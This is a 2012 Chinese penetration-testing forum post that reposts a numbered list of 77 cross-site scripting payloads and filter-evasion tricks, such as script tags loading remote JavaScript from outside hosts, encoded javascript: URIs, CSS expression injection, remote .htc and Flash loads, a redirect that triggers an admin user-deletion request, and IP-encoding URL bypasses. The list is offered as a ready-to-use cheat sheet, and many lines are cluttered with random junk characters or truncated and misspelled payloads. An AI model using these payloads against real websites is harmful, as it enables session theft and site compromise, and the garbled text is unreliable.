中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。- W$ {/ m5 y6 D5 n, z3 j7 ^, x' a  t
! e" i, l1 i' Y* G3 B
(1)普通的XSS JavaScript注入
$ G- x! M: a/ d) J/ x& Y2 i8 e& u <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 \- `% j% f# X+ l
1 ~0 T5 y, ]" h' }/ m: q1 O (2)IMG标签XSS使用JavaScript命令$ |1 |) h+ H8 F4 B5 o: k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; s5 t8 G) `/ D; e) O" p! w* X$ F. U, r6 ^; ]& }0 |) Q# q
(3)IMG标签无分号无引号
& b& m+ V$ c6 } <IMG SRC=javascript:alert(‘XSS’)>2 k5 [) u% N+ Y$ O

( h: Q6 w. N" C: j; F (4)IMG标签大小写不敏感
" H; U' b5 n( u; P! Y) J" i7 ^ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ `! Z: {( q" w* u4 b! P( X
4 E8 {, @$ {6 j: `* b (5)HTML编码(必须有分号)) x$ m+ N5 I9 Q+ B
<IMG SRC=javascript:alert(“XSS”)>
! p! W7 W) o2 ^  b. H! t, P$ P8 D4 z, T! U" o
(6)修正缺陷IMG标签
8 [6 d" b. j; d6 `+ i <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. V3 _- P$ d% s9 z( s

6 O' U$ k4 W& x! v7 P (7)formCharCode标签(计算器)
1 r9 T* z; [, @ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
% |, O3 H5 q) b" O0 }( q+ F/ @+ q
(8)UTF-8的Unicode编码(计算器)8 y7 ?, [7 T3 M" L& S  m6 v; E9 S
<IMG SRC=jav..省略..S')>
- \6 n$ k1 S! H7 F
6 r1 L0 z' W* m* [4 O (9)7位的UTF-8的Unicode编码是没有分号的(计算器)* u1 @& I. T# D
<IMG SRC=jav..省略..S')>
0 g  Y0 y2 T$ V9 ]
# q, u' u' m" O7 u% Z% J- @ (10)十六进制编码也是没有分号(计算器)/ o  f' g  c; F+ g6 D. s
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
* N7 u8 S4 @" l
  S1 c& G7 `9 r (11)嵌入式标签,将Javascript分开
  u$ t; E3 A: \- Z% Z+ t <IMG SRC=”jav ascript:alert(‘XSS’);”>
' i9 c( u! q1 F5 _& I" g/ X1 H2 x: k  o; n# p
(12)嵌入式编码标签,将Javascript分开
; I, C- O$ B$ N: Y, L <IMG SRC=”jav ascript:alert(‘XSS’);”>7 C8 X! M) F$ f

% n9 s5 E( V& U (13)嵌入式换行符# S+ T6 |' ?3 `# c
<IMG SRC=”jav ascript:alert(‘XSS’);”># d1 r$ }" s: F  {

& B' G( q* Z* K3 w. K (14)嵌入式回车) X$ |5 w6 O- S: m4 A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; X) e2 R. f7 c$ z3 ?/ i
+ l5 q1 o+ X" i1 P% Q% _- a0 b (15)嵌入式多行注入JavaScript,这是XSS极端的例子
( b7 O1 r& h& _ <IMG SRC=”javascript:alert(‘XSS‘)”>6 n( D' Q1 a" k  L. y8 [) w
9 J& ]$ ]6 V. i, A# b
(16)解决限制字符(要求同页面). k, d+ A' P9 `
<script>z=’document.’</script>
: X; I  G  `; O6 q$ g <script>z=z+’write(“‘</script>! v7 ]/ o, P: d, g. n" E" F' L& c
<script>z=z+’<script’</script>: I2 k8 b) J, |% `- M
<script>z=z+’ src=ht’</script>
/ g& O  e. H+ w <script>z=z+’tp://ww’</script>
9 i8 N# y# m4 C" | <script>z=z+’w.shell’</script>& p" h7 \- t& i% _9 y
<script>z=z+’.net/1.’</script>
8 E2 @; o9 D8 s! n, a <script>z=z+’js></sc’</script>
" f; q2 s# z" `; B <script>z=z+’ript>”)’</script>2 D7 v3 o& x: C* i1 `- J' q
<script>eval_r(z)</script>
" b8 q+ [4 O% F3 M: R
7 Y' q# S) ]" T3 h) j (17)空字符9 N$ G$ j- m. R9 L# O1 L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 m: s% I* j! f* F$ v$ Y% z
- M& d0 K" K0 q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
# K/ }7 P/ Z4 f4 x perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 I8 G$ l$ a3 g) `3 B. l
+ P2 Y: j+ v3 i' v8 P. ^
(19)Spaces和meta前的IMG标签
% D! `) g3 c$ c* M% P8 G; @" ? <IMG SRC=”   javascript:alert(‘XSS’);”>$ g6 }( }" j! E+ ?% W8 M
/ F# \( m7 r6 |8 r# G
(20)Non-alpha-non-digit XSS( Q" Y7 u* M7 B" C- x* N+ j
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 c. Y) u* s6 B- ?$ d0 k2 C7 H/ d! V7 b6 |' @6 |% H
(21)Non-alpha-non-digit XSS to 2
8 O0 m0 d% s0 p/ X# i% U3 j2 S# I <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( h$ U9 V: s, j+ w, P) x+ c" x
: |& ]2 m. m4 H: c
(22)Non-alpha-non-digit XSS to 3
( m$ }, B) j+ U+ G <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 W; z' u+ ^  c; b* Y: a( M; Q$ M# p" \1 c& V# M
(23)双开括号; Y9 R$ K4 U+ {$ E
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
) p& f: z0 y& w9 p; D" j( f. O) [! J+ k5 B, c: |
(24)无结束脚本标记(仅火狐等浏览器). S  z" f1 c6 r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ j' k0 `: ~2 O2 n2 u4 K' Y
0 X9 @/ t; x- d* p' ?: l6 w
(25)无结束脚本标记2
2 u; C- x6 L) I1 m; F& E4 ~ <SCRIPT SRC=//3w.org/XSS/xss.js>4 F9 _( Z4 ?  N1 g
" \; s# p6 S5 `# A. F! u+ Y! S+ `
(26)半开的HTML/JavaScript XSS
9 e$ b8 g7 e# b <IMG SRC=”javascript:alert(‘XSS’)”4 ]1 u/ b& d% W4 ^! e4 a1 c- H
* X7 k% T3 k# e2 @6 {/ g* l" X
(27)双开角括号) q2 w' m8 z0 z- a, [: `
<iframe src=http://3w.org/XSS.html </ ?9 s9 a# |7 V3 x

3 j" n' e; i, y' T (28)无单引号 双引号 分号
/ Z) i3 [) u* t6 s <SCRIPT>a=/XSS/# [$ v# U8 q: w% e4 v$ x9 B2 d
alert(a.source)</SCRIPT>
! J9 {$ t4 \, M. e2 V8 C9 M5 c9 Z5 }# m% D4 S& ]  ?0 E
(29)换码过滤的JavaScript
/ w( {& |% T; H1 L+ [; S \”;alert(‘XSS’);//6 Y1 G1 E$ |5 ^3 C/ e

. [; n( H" v8 G) _- P (30)结束Title标签
; \6 [! c/ \6 a% @6 X1 B </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>6 U; [# n5 H8 t
8 O; g! H) u1 Z
(31)Input Image# f( M& h9 B( |1 M' R5 T& b8 ?% r
<INPUT SRC=”javascript:alert(‘XSS’);”>4 H4 ?- u* h/ Q

3 Y; R) K4 U* A5 \% l (32)BODY Image) {  u( V: U3 \6 L
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ @& H5 F% T6 U# _$ a8 @
8 b. V1 K* y" W, r3 b2 {9 A
(33)BODY标签) }1 R; k. X7 e
<BODY(‘XSS’)>; i. }' y; t0 F& G- N

  G5 f" F9 X% F" X (34)IMG Dynsrc
# D4 l: K% r( q9 X; h9 h& Q, ]9 r <IMG DYNSRC=”javascript:alert(‘XSS’)”>3 K+ A, z4 x6 R8 F! t- ?

% W# x" I* k2 a6 m) V8 b (35)IMG Lowsrc' m9 ?% z) Y( C5 Y/ {
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
9 s, ^) P  B# O2 U* k1 N3 A& |) X" \1 h- [% O, Y1 A$ `" }' p
(36)BGSOUND0 ^* I+ A; |# S6 g, G/ v
<BGSOUND SRC=”javascript:alert(‘XSS’);”>1 Z% K7 c) T7 B$ B8 ]

9 u9 C% s9 d" y6 y (37)STYLE sheet
' f: Y* P. q+ r& d9 c6 c+ g5 g <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, ?0 O8 m0 D8 t# A8 ^

3 c  N, u& K: m4 L( V (38)远程样式表
( D/ J" c. z' u6 ]' V6 q <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 a9 g, h# x5 w7 Q6 X( l
, [: U4 c6 \4 z( U% N  }! `# Y
(39)List-style-image(列表式)
4 T1 ^+ h; q+ l  m <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: \! z3 F( a* A. L) K4 _
  [2 r: r: N8 a: \4 n1 w2 P4 m
(40)IMG VBscript
0 {7 m& r$ t' F. V0 B9 S1 J" ^6 H <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! ?% W9 x7 b+ @, Z' D2 ~; l7 \) p& s0 q$ p- c) W: V
(41)META链接url
" |& C$ |  y$ X9 q$ X% L <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>; b# P5 O2 ]5 D# x4 w9 B

, F% M7 L4 u- e$ ^# ~- M( u, g (42)Iframe
& M; X# |' E2 l9 N$ t <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
/ {# R" R/ d1 t
/ t, r( t, |, o (43)Frame
( u  U+ u7 U6 S5 w <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET># w+ D5 h) @3 Y  u8 p) `2 ]4 R
. i& x- v. Q( a: J2 s# ^- O
(44)Table  l$ F$ T, E( Z* y! M) \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! Y, s5 E, [6 T! G/ O5 d% G  S

  v$ A+ H% {  Q+ X5 R2 `; R9 a (45)TD
2 _! o" o6 o* a- s% d/ } <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ d* N$ T4 o/ S5 H( F" i
8 K" {' m6 P& Q* C1 _
(46)DIV background-image: x4 I" z8 v) a1 q; m2 ?; l. [6 z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 j3 U" m' N6 Y& q

# }. Z  }! q) x (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- w$ x/ `& B5 [* D5 I: D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ ^4 j! q) m- Q- i2 ]/ O9 |4 J: z* L5 h9 H2 K5 n& U
(48)DIV expression
1 p; q9 q6 z. X) F! R% z# ~ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 o+ q+ L# F& ^- D- `+ X, L+ ^( b  X: Z8 y8 p
(49)STYLE属性分拆表达
7 x, F- i+ j$ Q/ X) C1 M <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. p& B! t0 a% N0 y6 V
4 ?* {& o6 J# ^5 [  y  I
(50)匿名STYLE(组成:开角号和一个字母开头)
2 I$ T2 Y2 U* N, Y: f <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" e# j5 T5 d$ i  e
! u' z5 K* t# Z$ t (51)STYLE background-image
, M* R/ h4 R  }. [, k  T2 s2 n( X! @ <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ c/ B' i. u5 d

  S7 J: \$ M! F (52)IMG STYLE方式
: r6 `# z8 D; J- a) s  u. K% V6 E exppression(alert(“XSS”))’>% t5 @8 K5 j( C8 {9 a
- w4 m$ w( [& h0 x- t2 [
(53)STYLE background
+ @4 _4 n7 O/ o$ H7 f# C <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 Z7 x' {2 o! m9 Q
  l  a% |& R3 s$ a
(54)BASE$ z1 ~( y) e$ L: c
<BASE HREF=”javascript:alert(‘XSS’);//”>) {8 u- I9 e% b6 R. }( b
3 w3 f# V9 |( Q3 v% g) s
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS/ s7 B# Z# Q4 M/ i
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>. h6 b! E9 m% R# k* V
. M! O5 N, C# q. O
(56)在flash中使用ActionScrpt可以混进你XSS的代码
) q7 d1 u$ m% ~9 g8 l  C' _ a=”get”;) U; E/ [4 }' u; ]# b. ]; R' _
b=”URL(\”";
8 x1 D1 i9 K& b% F, U9 Z0 F c=”javascript:”;  [  H+ F/ D" n3 w6 M3 J$ W7 y  @
d=”alert(‘XSS’);\”)”;: x+ u/ I  ~) o5 h
eval_r(a+b+c+d);
1 D  @  E) C4 z9 ]
9 @3 r- I# p- u. z (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; V, R4 }. F& w9 q+ F8 ^2 m( | <HTML xmlns:xss>" D$ C9 q% f8 G$ q2 G* b  {
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>6 r4 m/ \2 l5 B7 Y) ?. C1 l
<xss:xss>XSS</xss:xss>
+ D1 W9 i( i) K, [ </HTML>
; Z: \% |+ Y' t" t7 `& i
% L, w: s. d* Z8 q6 e/ K3 i0 X (58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 f7 ]( a% L4 N
<SCRIPT SRC=””></SCRIPT>
* o! w5 g  a8 R* L6 k' V7 L# U4 ^9 J. H$ D
(59)IMG嵌入式命令,可执行任意命令7 j0 y( R6 l7 @0 `7 [2 Y9 D: O3 d
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
& W+ U  K5 U! E* }/ @! N
+ s8 f# Z- y/ h6 m* [' S% M; G (60)IMG嵌入式命令(a.jpg在同服务器)0 l9 l0 P: c- F8 Q
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
1 O! x& }7 k. y  ]1 a' V% U8 L1 C! ]1 m+ Q( g6 I+ V, {
(61)绕符号过滤
, C- a, \! W1 F" f9 x- Y" R( i$ U <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 d" b0 T5 q/ ~( \" x5 }0 Y$ p: y
- h: [4 d4 H& M; U" x2 n2 l, q
(62)
" a( q- }* n& b/ q. {8 {9 p <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) J5 M8 f( Z# `; f. Y- X; H
% w/ q+ i4 D5 ]; A! W( N- k (63)3 }* x6 W' y6 \. r& i
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
; M$ F: q+ A3 r! y7 ^  V/ t0 ?, m" g- U/ G$ D0 \) b9 a4 k
(64)
$ [- ^5 N( x5 r" f; d, Z; K <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
' e, S" S  D" s0 h+ f
7 b9 e& F6 L5 A2 b7 f (65)- S7 M# Q  M) q' l  M- G5 r* B+ \
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
# z/ f# m0 h8 \  m  g9 q0 q6 \& S7 S3 }6 c. z" r
(66)
8 P4 D* y9 S8 P3 I" A <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 W6 z1 H; }  [9 v

& L. o/ B7 [1 k1 { (67)
6 I. X% a5 y) T <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: ?, y0 `) }( Y
/ G  ?4 m: g, c (68)URL绕行9 H; A/ ^: A4 {3 ?/ Y
<A HREF=”http://127.0.0.1/”>XSS</A>
* D; @3 }& Q, F5 ^& l! W% Y+ u7 h7 ~
(69)URL编码
( d+ K9 P( }* G8 P( S8 u/ w. L <A HREF=”http://3w.org”>XSS</A>9 m2 m7 L# T& E& q/ b

6 Y7 M. O- G& y7 K1 P" ]0 l (70)IP十进制$ ]" i/ p- G3 P. M# T' R; h4 G" n" n
<A HREF=”http://3232235521″>XSS</A>
$ A8 [5 R8 c  j: Z
6 M+ t1 a* ^' O8 _3 R, Y (71)IP十六进制
4 P# [5 @/ ~) \; [ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, j' w$ ]1 i# g, y& Y
1 w5 n+ ~$ x9 w- Q' u
(72)IP八进制2 M' c4 O& r  a4 a! o, Q. k( G$ g
<A HREF=”http://0300.0250.0000.0001″>XSS</A>5 }1 q% w8 ?( m

- I3 }- _6 `3 G0 g (73)混合编码. A- K1 X$ ~9 f/ F
<A HREF=”h& g" L# h8 U9 q# S3 K4 D; v
tt p://6 6.000146.0×7.147/”">XSS</A>7 }9 @, n, p6 o- {6 U9 J+ e

1 L6 h: N& |- n' Q# k5 L (74)节省[http:]
# u$ C; b+ d) y! @+ } <A HREF=”//www.google.com/”>XSS</A>  b  \$ T, Z1 K! I# {3 l% r
, R% Z5 K! `/ ]$ v7 h
(75)节省[www]3 Z8 _- g- T- d: E" e
<A HREF=”http://google.com/”>XSS</A>, B5 s6 e& q" F" e1 A# W( \

8 H: ^# F, R# A" A; `6 y (76)绝对点绝对DNS, f0 ~$ h- x! C) g  g% k
<A HREF=”http://www.google.com./”>XSS</A>
, T5 u" x  d7 Y& l2 e1 Q' t
& w& O2 a) c* [7 q (77)javascript链接
5 n& k& Z( d" P5 C2 c <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2